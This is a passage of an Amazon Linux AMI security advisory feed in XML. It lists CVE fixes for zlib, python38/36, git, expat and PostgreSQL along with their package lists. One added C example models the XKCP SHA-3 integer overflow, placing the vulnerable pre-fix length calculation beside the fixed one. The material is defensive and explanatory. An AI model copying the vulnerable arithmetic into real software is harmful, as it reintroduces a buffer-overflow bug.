</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-37434" title="" id="CVE-2022-37434" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="minizip" version="1.2.8" release="7.20.amzn1" epoch="0" arch="x86_64"><filename>Packages/minizip-1.2.8-7.20.amzn1.x86_64.rpm</filename></package><package name="minizip-devel" version="1.2.8" release="7.20.amzn1" epoch="0" arch="x86_64"><filename>Packages/minizip-devel-1.2.8-7.20.amzn1.x86_64.rpm</filename></package><package name="zlib-debuginfo" version="1.2.8" release="7.20.amzn1" epoch="0" arch="x86_64"><filename>Packages/zlib-debuginfo-1.2.8-7.20.amzn1.x86_64.rpm</filename></package><package name="zlib-static" version="1.2.8" release="7.20.amzn1" epoch="0" arch="x86_64"><filename>Packages/zlib-static-1.2.8-7.20.amzn1.x86_64.rpm</filename></package><package name="zlib" version="1.2.8" release="7.20.amzn1" epoch="0" arch="x86_64"><filename>Packages/zlib-1.2.8-7.20.amzn1.x86_64.rpm</filename></package><package name="zlib-devel" version="1.2.8" release="7.20.amzn1" epoch="0" arch="x86_64"><filename>Packages/zlib-devel-1.2.8-7.20.amzn1.x86_64.rpm</filename></package><package name="zlib" version="1.2.8" release="7.20.amzn1" epoch="0" arch="i686"><filename>Packages/zlib-1.2.8-7.20.amzn1.i686.rpm</filename></package><package name="minizip" version="1.2.8" release="7.20.amzn1" epoch="0" arch="i686"><filename>Packages/minizip-1.2.8-7.20.amzn1.i686.rpm</filename></package><package name="zlib-static" version="1.2.8" release="7.20.amzn1" epoch="0" arch="i686"><filename>Packages/zlib-static-1.2.8-7.20.amzn1.i686.rpm</filename></package><package name="minizip-devel" version="1.2.8" release="7.20.amzn1" epoch="0" arch="i686"><filename>Packages/minizip-devel-1.2.8-7.20.amzn1.i686.rpm</filename></package><package name="zlib-devel" version="1.2.8" release="7.20.amzn1" epoch="0" 
arch="i686"><filename>Packages/zlib-devel-1.2.8-7.20.amzn1.i686.rpm</filename></package><package name="zlib-debuginfo" version="1.2.8" release="7.20.amzn1" epoch="0" arch="i686"><filename>Packages/zlib-debuginfo-1.2.8-7.20.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2022-1651</id><title>Amazon Linux AMI 2014.03 - ALAS-2022-1651: important priority package update for python38</title><issued date="2022-12-01 17:34:00" /><updated date="2022-12-10 00:39:00" /><severity>important</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2022-37454:
The Keccak XKCP SHA-3 reference implementation before fdc6fef has an integer overflow and resultant buffer overflow that allows attackers to execute arbitrary code or eliminate expected cryptographic properties. This occurs in the sponge function interface.
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-37454" title="" id="CVE-2022-37454" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="python38-debug" version="3.8.5" release="1.6.amzn1" epoch="0" arch="x86_64"><filename>Packages/python38-debug-3.8.5-1.6.amzn1.x86_64.rpm</filename></package><package name="python38-test" version="3.8.5" release="1.6.amzn1" epoch="0" arch="x86_64"><filename>Packages/python38-test-3.8.5-1.6.amzn1.x86_64.rpm</filename></package><package name="python38-debuginfo" version="3.8.5" release="1.6.amzn1" epoch="0" arch="x86_64"><filename>Packages/python38-debuginfo-3.8.5-1.6.amzn1.x86_64.rpm</filename></package><package name="python38-tools" version="3.8.5" release="1.6.amzn1" epoch="0" arch="x86_64"><filename>Packages/python38-tools-3.8.5-1.6.amzn1.x86_64.rpm</filename></package><package name="python38-devel" version="3.8.5" release="1.6.amzn1" epoch="0" arch="x86_64"><filename>Packages/python38-devel-3.8.5-1.6.amzn1.x86_64.rpm</filename></package><package name="python38-libs" version="3.8.5" release="1.6.amzn1" epoch="0" arch="x86_64"><filename>Packages/python38-libs-3.8.5-1.6.amzn1.x86_64.rpm</filename></package><package name="python38" version="3.8.5" release="1.6.amzn1" epoch="0" arch="x86_64"><filename>Packages/python38-3.8.5-1.6.amzn1.x86_64.rpm</filename></package><package name="python38-tools" version="3.8.5" release="1.6.amzn1" epoch="0" arch="i686"><filename>Packages/python38-tools-3.8.5-1.6.amzn1.i686.rpm</filename></package><package name="python38-libs" version="3.8.5" release="1.6.amzn1" epoch="0" arch="i686"><filename>Packages/python38-libs-3.8.5-1.6.amzn1.i686.rpm</filename></package><package name="python38" version="3.8.5" release="1.6.amzn1" epoch="0" arch="i686"><filename>Packages/python38-3.8.5-1.6.amzn1.i686.rpm</filename></package><package name="python38-debug" version="3.8.5" release="1.6.amzn1" epoch="0" 
arch="i686"><filename>Packages/python38-debug-3.8.5-1.6.amzn1.i686.rpm</filename></package><package name="python38-debuginfo" version="3.8.5" release="1.6.amzn1" epoch="0" arch="i686"><filename>Packages/python38-debuginfo-3.8.5-1.6.amzn1.i686.rpm</filename></package><package name="python38-test" version="3.8.5" release="1.6.amzn1" epoch="0" arch="i686"><filename>Packages/python38-test-3.8.5-1.6.amzn1.i686.rpm</filename></package><package name="python38-devel" version="3.8.5" release="1.6.amzn1" epoch="0" arch="i686"><filename>Packages/python38-devel-3.8.5-1.6.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2022-1652</id><title>Amazon Linux AMI 2014.03 - ALAS-2022-1652: important priority package update for python36</title><issued date="2022-12-01 17:34:00" /><updated date="2022-12-10 00:38:00" /><severity>important</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2022-37454:
The Keccak XKCP SHA-3 reference implementation before fdc6fef has an integer overflow and resultant buffer overflow that allows attackers to execute arbitrary code or eliminate expected cryptographic properties. This occurs in the sponge function interface.
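<![CDATA[
The integer overflow itself, as an added example that is not code from this advisory or from XKCP, serving both the python38 (ALAS-2022-1651) and python36 (ALAS-2022-1652) entries: the two functions are modelled on the partial-block branch of the sponge absorb loop in XKCP's KeccakSponge.inc before and after commit fdc6fef, keeping that file's variable names (dataByteLen - i is passed in as remaining); the input sizes are constructed. Python's hashlib SHA-3 objects are built on this code, which is why a single update() call with more than 4 GiB of data reaches it. The program never performs the oversized memcpy; it computes the length each version would pass and checks it against the 200-byte Keccak state.

```c
#include <stdint.h>
#include <stddef.h>
#include <stdio.h>

/* Keccak-f[1600] state is 200 bytes; SHA3-256 absorbs at a 136-byte rate. */
#define KECCAK_STATE_BYTES 200u
#define SHA3_256_RATE      136u

/* Length handed to memcpy by the absorb loop before the fix. `remaining` is
   dataByteLen - i (a size_t); byteIOIndex and rateInBytes are the instance's
   unsigned int fields. Truncating to unsigned int and then adding byteIOIndex
   in unsigned int wraps when remaining is just below a multiple of 4 GiB, so
   the bound check passes and a multi-gigabyte length is returned. */
static unsigned absorb_len_before_fix(size_t remaining, unsigned byteIOIndex,
                                      unsigned rateInBytes) {
    unsigned partialBlock = (unsigned)remaining;
    if (partialBlock + byteIOIndex > rateInBytes)
        partialBlock = rateInBytes - byteIOIndex;
    return partialBlock;
}

/* After the fix: compare in size_t against the room left in the block and
   only narrow to unsigned int once the value is known to be small. */
static unsigned absorb_len_after_fix(size_t remaining, unsigned byteIOIndex,
                                     unsigned rateInBytes) {
    unsigned partialBlock;
    if (remaining > (size_t)(rateInBytes - byteIOIndex))
        partialBlock = rateInBytes - byteIOIndex;
    else
        partialBlock = (unsigned)remaining;
    return partialBlock;
}

/* 1 if a memcpy of `len` bytes at offset `byteIOIndex` would run past the
   200-byte state, i.e. a length the absorb loop must never produce. */
static int overflows_state(unsigned len, unsigned byteIOIndex) {
    return (uint64_t)len + byteIOIndex > KECCAK_STATE_BYTES;
}

int main(void) {
    /* One update() of just under 4 GiB while 32 bytes are already queued
       in the current block (constructed sizes). */
    size_t remaining = (size_t)0xFFFFFFF0u;
    unsigned idx = 32;
    unsigned before = absorb_len_before_fix(remaining, idx, SHA3_256_RATE);
    unsigned after  = absorb_len_after_fix(remaining, idx, SHA3_256_RATE);
    printf("before fix: copy %u bytes (overflows state: %d)\n",
           before, overflows_state(before, idx));
    printf("after fix:  copy %u bytes (overflows state: %d)\n",
           after, overflows_state(after, idx));
    return 0;
}
```

For inputs that fit in an unsigned int the two versions agree, which is why ordinary hashing never showed the problem; the wrap only appears when remaining mod 2^32 lies within byteIOIndex of 2^32, so a process must be able to hand the sponge a buffer of roughly 4 GiB in one call to hit it.
]]>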
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-37454" title="" id="CVE-2022-37454" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="python36-devel" version="3.6.12" release="1.23.amzn1" epoch="0" arch="x86_64"><filename>Packages/python36-devel-3.6.12-1.23.amzn1.x86_64.rpm</filename></package><package name="python36-libs" version="3.6.12" release="1.23.amzn1" epoch="0" arch="x86_64"><filename>Packages/python36-libs-3.6.12-1.23.amzn1.x86_64.rpm</filename></package><package name="python36-test" version="3.6.12" release="1.23.amzn1" epoch="0" arch="x86_64"><filename>Packages/python36-test-3.6.12-1.23.amzn1.x86_64.rpm</filename></package><package name="python36-debug" version="3.6.12" release="1.23.amzn1" epoch="0" arch="x86_64"><filename>Packages/python36-debug-3.6.12-1.23.amzn1.x86_64.rpm</filename></package><package name="python36-tools" version="3.6.12" release="1.23.amzn1" epoch="0" arch="x86_64"><filename>Packages/python36-tools-3.6.12-1.23.amzn1.x86_64.rpm</filename></package><package name="python36" version="3.6.12" release="1.23.amzn1" epoch="0" arch="x86_64"><filename>Packages/python36-3.6.12-1.23.amzn1.x86_64.rpm</filename></package><package name="python36-debuginfo" version="3.6.12" release="1.23.amzn1" epoch="0" arch="x86_64"><filename>Packages/python36-debuginfo-3.6.12-1.23.amzn1.x86_64.rpm</filename></package><package name="python36-libs" version="3.6.12" release="1.23.amzn1" epoch="0" arch="i686"><filename>Packages/python36-libs-3.6.12-1.23.amzn1.i686.rpm</filename></package><package name="python36-test" version="3.6.12" release="1.23.amzn1" epoch="0" arch="i686"><filename>Packages/python36-test-3.6.12-1.23.amzn1.i686.rpm</filename></package><package name="python36-tools" version="3.6.12" release="1.23.amzn1" epoch="0" arch="i686"><filename>Packages/python36-tools-3.6.12-1.23.amzn1.i686.rpm</filename></package><package name="python36" 
version="3.6.12" release="1.23.amzn1" epoch="0" arch="i686"><filename>Packages/python36-3.6.12-1.23.amzn1.i686.rpm</filename></package><package name="python36-debuginfo" version="3.6.12" release="1.23.amzn1" epoch="0" arch="i686"><filename>Packages/python36-debuginfo-3.6.12-1.23.amzn1.i686.rpm</filename></package><package name="python36-debug" version="3.6.12" release="1.23.amzn1" epoch="0" arch="i686"><filename>Packages/python36-debug-3.6.12-1.23.amzn1.i686.rpm</filename></package><package name="python36-devel" version="3.6.12" release="1.23.amzn1" epoch="0" arch="i686"><filename>Packages/python36-devel-3.6.12-1.23.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2022-1653</id><title>Amazon Linux AMI 2014.03 - ALAS-2022-1653: important priority package update for git</title><issued date="2022-12-01 17:34:00" /><updated date="2022-12-10 00:38:00" /><severity>important</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2022-39260:
Git is an open source, scalable, distributed revision control system. git shell is a restricted login shell that can be used to implement Git's push/pull functionality via SSH. In versions prior to 2.30.6, 2.31.5, 2.32.4, 2.33.5, 2.34.5, 2.35.5, 2.36.3, and 2.37.4, the function that splits the command arguments into an array improperly uses an int to represent the number of entries in the array, allowing a malicious actor to intentionally overflow the return value, leading to arbitrary heap writes. Because the resulting array is then passed to execv(), it is possible to leverage this attack to gain remote code execution on a victim machine. Note that a victim must first allow access to git shell as a login shell in order to be vulnerable to this attack. This problem is patched in versions 2.30.6, 2.31.5, 2.32.4, 2.33.5, 2.34.5, 2.35.5, 2.36.3, and 2.37.4 and users are advised to upgrade to the latest version. Disabling git shell access via remote logins is a viable short-term workaround.
CVE-2022-39253:
Git is an open source, scalable, distributed revision control system. Versions prior to 2.30.6, 2.31.5, 2.32.4, 2.33.5, 2.34.5, 2.35.5, 2.36.3, and 2.37.4 are subject to exposure of sensitive information to a malicious actor. When performing a local clone (where the source and target of the clone are on the same volume), Git copies the contents of the source's /objects directory into the destination by either creating hardlinks to the source contents, or copying them (if hardlinks are disabled via --no-hardlinks). A malicious actor could convince a victim to clone a repository with a symbolic link pointing at sensitive information on the victim's machine. This can be done either by having the victim clone a malicious repository on the same machine, or having them clone a malicious repository embedded as a bare repository via a submodule from any source, provided they clone with the --recurse-submodules option. Git does not create symbolic links in the /objects directory. The problem has been patched in the versions published on 2022-10-18, and backported to v2.30.x. Potential workarounds: Avoid cloning untrusted repositories using the --local optimization when on a shared machine, either by passing the --no-local option to git clone or cloning from a URL that uses the file:// scheme. Alternatively, avoid cloning repositories from untrusted sources with --recurse-submodules or run git config --global protocol.file.allow user.
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-39253" title="" id="CVE-2022-39253" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-39260" title="" id="CVE-2022-39260" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="git-core" version="2.38.1" release="1.77.amzn1" epoch="0" arch="x86_64"><filename>Packages/git-core-2.38.1-1.77.amzn1.x86_64.rpm</filename></package><package name="git-instaweb" version="2.38.1" release="1.77.amzn1" epoch="0" arch="x86_64"><filename>Packages/git-instaweb-2.38.1-1.77.amzn1.x86_64.rpm</filename></package><package name="git-core-doc" version="2.38.1" release="1.77.amzn1" epoch="0" arch="noarch"><filename>Packages/git-core-doc-2.38.1-1.77.amzn1.noarch.rpm</filename></package><package name="git-email" version="2.38.1" release="1.77.amzn1" epoch="0" arch="noarch"><filename>Packages/git-email-2.38.1-1.77.amzn1.noarch.rpm</filename></package><package name="git-p4" version="2.38.1" release="1.77.amzn1" epoch="0" arch="noarch"><filename>Packages/git-p4-2.38.1-1.77.amzn1.noarch.rpm</filename></package><package name="gitweb" version="2.38.1" release="1.77.amzn1" epoch="0" arch="noarch"><filename>Packages/gitweb-2.38.1-1.77.amzn1.noarch.rpm</filename></package><package name="git-bzr" version="2.38.1" release="1.77.amzn1" epoch="0" arch="noarch"><filename>Packages/git-bzr-2.38.1-1.77.amzn1.noarch.rpm</filename></package><package name="emacs-git" version="2.38.1" release="1.77.amzn1" epoch="0" arch="noarch"><filename>Packages/emacs-git-2.38.1-1.77.amzn1.noarch.rpm</filename></package><package name="git-daemon" version="2.38.1" release="1.77.amzn1" epoch="0" arch="x86_64"><filename>Packages/git-daemon-2.38.1-1.77.amzn1.x86_64.rpm</filename></package><package name="git-subtree" version="2.38.1" release="1.77.amzn1" epoch="0" 
arch="x86_64"><filename>Packages/git-subtree-2.38.1-1.77.amzn1.x86_64.rpm</filename></package><package name="git-hg" version="2.38.1" release="1.77.amzn1" epoch="0" arch="noarch"><filename>Packages/git-hg-2.38.1-1.77.amzn1.noarch.rpm</filename></package><package name="perl-Git-SVN" version="2.38.1" release="1.77.amzn1" epoch="0" arch="noarch"><filename>Packages/perl-Git-SVN-2.38.1-1.77.amzn1.noarch.rpm</filename></package><package name="git-debuginfo" version="2.38.1" release="1.77.amzn1" epoch="0" arch="x86_64"><filename>Packages/git-debuginfo-2.38.1-1.77.amzn1.x86_64.rpm</filename></package><package name="git-all" version="2.38.1" release="1.77.amzn1" epoch="0" arch="noarch"><filename>Packages/git-all-2.38.1-1.77.amzn1.noarch.rpm</filename></package><package name="perl-Git" version="2.38.1" release="1.77.amzn1" epoch="0" arch="noarch"><filename>Packages/perl-Git-2.38.1-1.77.amzn1.noarch.rpm</filename></package><package name="git-cvs" version="2.38.1" release="1.77.amzn1" epoch="0" arch="noarch"><filename>Packages/git-cvs-2.38.1-1.77.amzn1.noarch.rpm</filename></package><package name="git-svn" version="2.38.1" release="1.77.amzn1" epoch="0" arch="x86_64"><filename>Packages/git-svn-2.38.1-1.77.amzn1.x86_64.rpm</filename></package><package name="emacs-git-el" version="2.38.1" release="1.77.amzn1" epoch="0" arch="noarch"><filename>Packages/emacs-git-el-2.38.1-1.77.amzn1.noarch.rpm</filename></package><package name="git" version="2.38.1" release="1.77.amzn1" epoch="0" arch="x86_64"><filename>Packages/git-2.38.1-1.77.amzn1.x86_64.rpm</filename></package><package name="git-daemon" version="2.38.1" release="1.77.amzn1" epoch="0" arch="i686"><filename>Packages/git-daemon-2.38.1-1.77.amzn1.i686.rpm</filename></package><package name="git-svn" version="2.38.1" release="1.77.amzn1" epoch="0" arch="i686"><filename>Packages/git-svn-2.38.1-1.77.amzn1.i686.rpm</filename></package><package name="git" version="2.38.1" release="1.77.amzn1" epoch="0" 
arch="i686"><filename>Packages/git-2.38.1-1.77.amzn1.i686.rpm</filename></package><package name="git-core" version="2.38.1" release="1.77.amzn1" epoch="0" arch="i686"><filename>Packages/git-core-2.38.1-1.77.amzn1.i686.rpm</filename></package><package name="git-debuginfo" version="2.38.1" release="1.77.amzn1" epoch="0" arch="i686"><filename>Packages/git-debuginfo-2.38.1-1.77.amzn1.i686.rpm</filename></package><package name="git-instaweb" version="2.38.1" release="1.77.amzn1" epoch="0" arch="i686"><filename>Packages/git-instaweb-2.38.1-1.77.amzn1.i686.rpm</filename></package><package name="git-subtree" version="2.38.1" release="1.77.amzn1" epoch="0" arch="i686"><filename>Packages/git-subtree-2.38.1-1.77.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2022-1654</id><title>Amazon Linux AMI 2014.03 - ALAS-2022-1654: important priority package update for expat</title><issued date="2022-12-01 17:34:00" /><updated date="2022-12-10 00:37:00" /><severity>important</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2022-40674:
A vulnerability was found in expat. It is possible to create a situation in which parsing is suspended while an internal entity is being substituted, so that XML_ResumeParser directly uses internalEntityProcessor as its processor. If the subsequent parse includes unclosed tags, this processor returns without calling storeRawNames, which is what ensures that the raw tag names are stored in memory other than the parse buffer itself. If the parse buffer is then changed or reallocated (for example, when processing a file line by line), the stored name pointers refer to freed or reused memory. An attacker can use this in the doContent function to trigger a denial of service or potentially arbitrary code execution.
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-40674" title="" id="CVE-2022-40674" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="expat-debuginfo" version="2.1.0" release="15.32.amzn1" epoch="0" arch="x86_64"><filename>Packages/expat-debuginfo-2.1.0-15.32.amzn1.x86_64.rpm</filename></package><package name="expat-devel" version="2.1.0" release="15.32.amzn1" epoch="0" arch="x86_64"><filename>Packages/expat-devel-2.1.0-15.32.amzn1.x86_64.rpm</filename></package><package name="expat" version="2.1.0" release="15.32.amzn1" epoch="0" arch="x86_64"><filename>Packages/expat-2.1.0-15.32.amzn1.x86_64.rpm</filename></package><package name="expat" version="2.1.0" release="15.32.amzn1" epoch="0" arch="i686"><filename>Packages/expat-2.1.0-15.32.amzn1.i686.rpm</filename></package><package name="expat-debuginfo" version="2.1.0" release="15.32.amzn1" epoch="0" arch="i686"><filename>Packages/expat-debuginfo-2.1.0-15.32.amzn1.i686.rpm</filename></package><package name="expat-devel" version="2.1.0" release="15.32.amzn1" epoch="0" arch="i686"><filename>Packages/expat-devel-2.1.0-15.32.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2022-1655</id><title>Amazon Linux AMI 2014.03 - ALAS-2022-1655: important priority package update for expat</title><issued date="2022-12-01 17:34:00" /><updated date="2022-12-10 00:37:00" /><severity>important</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2022-43680:
In libexpat through 2.4.9, there is a use-after-free caused by overeager destruction of a shared DTD in XML_ExternalEntityParserCreate in out-of-memory situations.
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-43680" title="" id="CVE-2022-43680" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="expat-devel" version="2.1.0" release="15.33.amzn1" epoch="0" arch="x86_64"><filename>Packages/expat-devel-2.1.0-15.33.amzn1.x86_64.rpm</filename></package><package name="expat" version="2.1.0" release="15.33.amzn1" epoch="0" arch="x86_64"><filename>Packages/expat-2.1.0-15.33.amzn1.x86_64.rpm</filename></package><package name="expat-debuginfo" version="2.1.0" release="15.33.amzn1" epoch="0" arch="x86_64"><filename>Packages/expat-debuginfo-2.1.0-15.33.amzn1.x86_64.rpm</filename></package><package name="expat-debuginfo" version="2.1.0" release="15.33.amzn1" epoch="0" arch="i686"><filename>Packages/expat-debuginfo-2.1.0-15.33.amzn1.i686.rpm</filename></package><package name="expat-devel" version="2.1.0" release="15.33.amzn1" epoch="0" arch="i686"><filename>Packages/expat-devel-2.1.0-15.33.amzn1.i686.rpm</filename></package><package name="expat" version="2.1.0" release="15.33.amzn1" epoch="0" arch="i686"><filename>Packages/expat-2.1.0-15.33.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2023-1657</id><title>Amazon Linux AMI 2014.03 - ALAS-2023-1657: medium priority package update for postgresql92</title><issued date="2023-01-18 20:56:00" /><updated date="2023-01-24 17:23:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2021-23214:
When the server is configured to use trust authentication with a clientcert requirement or to use cert authentication, a man-in-the-middle attacker can inject arbitrary SQL queries when a connection is first established, despite the use of SSL certificate verification and encryption.
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-23214" title="" id="CVE-2021-23214" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="postgresql92-contrib" version="9.2.24" release="3.68.amzn1" epoch="0" arch="x86_64"><filename>Packages/postgresql92-contrib-9.2.24-3.68.amzn1.x86_64.rpm</filename></package><package name="postgresql92-plpython26" version="9.2.24" release="3.68.amzn1" epoch="0" arch="x86_64"><filename>Packages/postgresql92-plpython26-9.2.24-3.68.amzn1.x86_64.rpm</filename></package><package name="postgresql92-test" version="9.2.24" release="3.68.amzn1" epoch="0" arch="x86_64"><filename>Packages/postgresql92-test-9.2.24-3.68.amzn1.x86_64.rpm</filename></package><package name="postgresql92-devel" version="9.2.24" release="3.68.amzn1" epoch="0" arch="x86_64"><filename>Packages/postgresql92-devel-9.2.24-3.68.amzn1.x86_64.rpm</filename></package><package name="postgresql92-plperl" version="9.2.24" release="3.68.amzn1" epoch="0" arch="x86_64"><filename>Packages/postgresql92-plperl-9.2.24-3.68.amzn1.x86_64.rpm</filename></package><package name="postgresql92-pltcl" version="9.2.24" release="3.68.amzn1" epoch="0" arch="x86_64"><filename>Packages/postgresql92-pltcl-9.2.24-3.68.amzn1.x86_64.rpm</filename></package><package name="postgresql92" version="9.2.24" release="3.68.amzn1" epoch="0" arch="x86_64"><filename>Packages/postgresql92-9.2.24-3.68.amzn1.x86_64.rpm</filename></package><package name="postgresql92-debuginfo" version="9.2.24" release="3.68.amzn1" epoch="0" arch="x86_64"><filename>Packages/postgresql92-debuginfo-9.2.24-3.68.amzn1.x86_64.rpm</filename></package><package name="postgresql92-docs" version="9.2.24" release="3.68.amzn1" epoch="0" arch="x86_64"><filename>Packages/postgresql92-docs-9.2.24-3.68.amzn1.x86_64.rpm</filename></package><package name="postgresql92-libs" version="9.2.24" release="3.68.amzn1" epoch="0" 
arch="x86_64"><filename>Packages/postgresql92-libs-9.2.24-3.68.amzn1.x86_64.rpm</filename></package><package name="postgresql92-server" version="9.2.24" release="3.68.amzn1" epoch="0" arch="x86_64"><filename>Packages/postgresql92-server-9.2.24-3.68.amzn1.x86_64.rpm</filename></package><package name="postgresql92-server-compat" version="9.2.24" release="3.68.amzn1" epoch="0" arch="x86_64"><filename>Packages/postgresql92-server-compat-9.2.24-3.68.amzn1.x86_64.rpm</filename></package><package name="postgresql92-plpython27" version="9.2.24" release="3.68.amzn1" epoch="0" arch="x86_64"><filename>Packages/postgresql92-plpython27-9.2.24-3.68.amzn1.x86_64.rpm</filename></package><package name="postgresql92-test" version="9.2.24" release="3.68.amzn1" epoch="0" arch="i686"><filename>Packages/postgresql92-test-9.2.24-3.68.amzn1.i686.rpm</filename></package><package name="postgresql92-plpython26" version="9.2.24" release="3.68.amzn1" epoch="0" arch="i686"><filename>Packages/postgresql92-plpython26-9.2.24-3.68.amzn1.i686.rpm</filename></package><package name="postgresql92-libs" version="9.2.24" release="3.68.amzn1" epoch="0" arch="i686"><filename>Packages/postgresql92-libs-9.2.24-3.68.amzn1.i686.rpm</filename></package><package name="postgresql92-plperl" version="9.2.24" release="3.68.amzn1" epoch="0" arch="i686"><filename>Packages/postgresql92-plperl-9.2.24-3.68.amzn1.i686.rpm</filename></package><package name="postgresql92-server" version="9.2.24" release="3.68.amzn1" epoch="0" arch="i686"><filename>Packages/postgresql92-server-9.2.24-3.68.amzn1.i686.rpm</filename></package><package name="postgresql92-contrib" version="9.2.24" release="3.68.amzn1" epoch="0" arch="i686"><filename>Packages/postgresql92-contrib-9.2.24-3.68.amzn1.i686.rpm</filename></package><package name="postgresql92" version="9.2.24" release="3.68.amzn1" epoch="0" arch="i686"><filename>Packages/postgresql92-9.2.24-3.68.amzn1.i686.rpm</filename></package><package name="postgresql92-plpython27" version="9.2.24" 
release="3.68.amzn1" epoch="0" arch="i686"><filename>Packages/postgresql92-plpython27-9.2.24-3.68.amzn1.i686.rpm</filename></package><package name="postgresql92-docs" version="9.2.24" release="3.68.amzn1" epoch="0" arch="i686"><filename>Packages/postgresql92-docs-9.2.24-3.68.amzn1.i686.rpm</filename></package><package name="postgresql92-server-compat" version="9.2.24" release="3.68.amzn1" epoch="0" arch="i686"><filename>Packages/postgresql92-server-compat-9.2.24-3.68.amzn1.i686.rpm</filename></package><package name="postgresql92-debuginfo" version="9.2.24" release="3.68.amzn1" epoch="0" arch="i686"><filename>Packages/postgresql92-debuginfo-9.2.24-3.68.amzn1.i686.rpm</filename></package><package name="postgresql92-pltcl" version="9.2.24" release="3.68.amzn1" epoch="0" arch="i686"><filename>Packages/postgresql92-pltcl-9.2.24-3.68.amzn1.i686.rpm</filename></package><package name="postgresql92-devel" version="9.2.24" release="3.68.amzn1" epoch="0" arch="i686"><filename>Packages/postgresql92-devel-9.2.24-3.68.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2023-1658</id><title>Amazon Linux AMI 2014.03 - ALAS-2023-1658: medium priority package update for postgresql93</title><issued date="2023-01-18 20:56:00" /><updated date="2023-01-24 17:23:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2021-23214:
When the server is configured to use trust authentication with a clientcert requirement or to use cert authentication, a man-in-the-middle attacker can inject arbitrary SQL queries when a connection is first established, despite the use of SSL certificate verification and encryption.
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-23214" title="" id="CVE-2021-23214" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="postgresql93-contrib" version="9.3.25" release="1.73.amzn1" epoch="0" arch="x86_64"><filename>Packages/postgresql93-contrib-9.3.25-1.73.amzn1.x86_64.rpm</filename></package><package name="postgresql93-server" version="9.3.25" release="1.73.amzn1" epoch="0" arch="x86_64"><filename>Packages/postgresql93-server-9.3.25-1.73.amzn1.x86_64.rpm</filename></package><package name="postgresql93" version="9.3.25" release="1.73.amzn1" epoch="0" arch="x86_64"><filename>Packages/postgresql93-9.3.25-1.73.amzn1.x86_64.rpm</filename></package><package name="postgresql93-plpython26" version="9.3.25" release="1.73.amzn1" epoch="0" arch="x86_64"><filename>Packages/postgresql93-plpython26-9.3.25-1.73.amzn1.x86_64.rpm</filename></package><package name="postgresql93-docs" version="9.3.25" release="1.73.amzn1" epoch="0" arch="x86_64"><filename>Packages/postgresql93-docs-9.3.25-1.73.amzn1.x86_64.rpm</filename></package><package name="postgresql93-debuginfo" version="9.3.25" release="1.73.amzn1" epoch="0" arch="x86_64"><filename>Packages/postgresql93-debuginfo-9.3.25-1.73.amzn1.x86_64.rpm</filename></package><package name="postgresql93-plpython27" version="9.3.25" release="1.73.amzn1" epoch="0" arch="x86_64"><filename>Packages/postgresql93-plpython27-9.3.25-1.73.amzn1.x86_64.rpm</filename></package><package name="postgresql93-plperl" version="9.3.25" release="1.73.amzn1" epoch="0" arch="x86_64"><filename>Packages/postgresql93-plperl-9.3.25-1.73.amzn1.x86_64.rpm</filename></package><package name="postgresql93-pltcl" version="9.3.25" release="1.73.amzn1" epoch="0" arch="x86_64"><filename>Packages/postgresql93-pltcl-9.3.25-1.73.amzn1.x86_64.rpm</filename></package><package name="postgresql93-devel" version="9.3.25" release="1.73.amzn1" epoch="0" 
